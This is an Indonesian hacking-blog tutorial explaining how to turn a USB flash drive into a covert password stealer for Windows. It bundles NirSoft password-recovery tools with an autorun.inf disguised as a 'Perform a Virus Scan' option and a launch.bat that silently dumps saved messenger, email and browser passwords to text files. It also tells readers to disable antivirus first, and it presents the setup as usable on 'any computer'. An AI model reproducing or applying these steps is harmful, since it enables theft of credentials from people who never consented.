Jumat, 02 April 2010

Mengendus Password memakai USB Flashdisk

Seperti yang kita semua tahu, Windows menyimpan sebagian besar password yang digunakan setiap hari, termasuk password instant messenger seperti MSN, Yahoo, AOL, Windows messenger dll. Seiring dengan ini, Windows juga menyimpan password dari Outlook Express, SMTP, POP , account FTP dan password otomatis-lengkap banyak browser seperti IE dan Firefox. Terdapat banyak alat bantu untuk memulihkan passswords ini dari tempat mereka disimpan. Menggunakan alat-alat dan USB flashdisk Anda dapat membuat rootkit Anda sendiri untuk mengendus password dari komputer manapun. Kami membutuhkan alat berikut untuk membuat rootkit kita.
MessenPass : Memulihkan password yang paling populer dari program Instant Messenger: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger yang disediakan dengan Netscape 7, Trillian, Miranda, dan Gaim.
PassView mail : Memulihkan password program email berikut: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Grup Mail Gratis.
PassView mail juga dapat mengembalikan password account email berbasis web (Hotmail, Yahoo, Gmail), jika Anda menggunakan program yang terkait account tersebut.

Passview IE : IE PassView adalah utility kecil yang mengungkapkan password disimpan oleh browser Internet Explorer. Ini mendukung Internet Explorer 7.0, serta versi internet explorer, v4.0 - v6.0
Protected Storage PassView : Memulihkan semua password disimpan di dalam Penyimpanan Dilindungi, termasuk password AutoComplete Internet Explorer, password situs yang memiliki proteksi password, MSN Explorer Sandi, dan banyak lagi ...
PasswordFox : PasswordFox adalah alat kecil pemulihan sandi yang memungkinkan Anda untuk melihat nama pengguna dan password disimpan oleh Web browser Mozilla Firefox. Secara default, PasswordFox menampilkan password disimpan dalam profil Anda saat ini, tetapi Anda dapat dengan mudah dapat memilih untuk menonton password profil Firefox lainnya.  Untuk setiap entri sandi, informasi berikut ini ditampilkan: Indeks Rekam, Web Site, Nama User, Password, User Nama Field, Password Bidang, dan nama file Signons.
Berikut ini adalah langkah demi langkah untuk menciptakan password hacking toolkit:
CATATAN: Anda harus menonaktifkan sementara antivirus Anda sebelum mengikuti langkah-langkah.
1. Download semua 5 alat, ekstrak itu dan copy saja executable () exe. File ke USB flashdisk.
 yaitu: Copy files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe ke dalam USB Drive.
2. Buat Notepad baru dan menulis teks berikut ke dalamnya
[autorun]
open=launch.bat

ACTION= Perform a Virus Scan

Simpan Notepad dan rename  dari New Text Document.txt menjadi autorun.inf
Sekarang salin file autorun.inf ke USB flashdisk Anda.

3. Buat Notepad dan copast teks berikut:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt  
Simpan Notepad dan rename file dari New Text Document.txt menjadi launch.bat
Salin file launch.bat juga untuk USB drive Anda.

Sekarang rootkit Anda siap dan Anda siap untuk mengendus password. Anda dapat menggunakan flashdisk pada di komputer manapun untuk mengendus password yang tersimpan.. Hanya ikuti langkah-langkah:

    1. Masukkan flashdisk dan Autorun kan membuat jendela pop-up. (Ini karena, kami telah membuat sebuah flashdisk autorun).
    2. Pada jendela pop-up, pilih opsi pertama (Perform a Virus Scan).
   
3.
Sekarang semua alat password recovery diam-diam akan dijalankan di
latar belakang (Proses ini memakan waktu hampir beberapa detik).
TXT
files.
Password bisa disimpan dalam  file
TXT.

    4. Keluarkan flashdisk dan Anda akan melihat password disimpan dalam file TXT.
Hack ini bekerja pada Windows 2000, XP dan Vista
CATATAN: prosedur ini hanya akan memulihkan password disimpan (jika ada) pada Komputer.

0 komentar:

Posting Komentar | Feed

Posting Komentar



 

Total Tayangan Halaman

BANNER

Belajar Hack Copyright © 2009 Premium Blogger Dashboard Designed by SAER

WELCOME TO BELAJAR HACK | BLOG BUAT ORANG-ORANG YANG INGIN BELAJAR HACKING | TIPS TRICK | DOWNLOAD SOFTWARE GRATIS FULL VERSION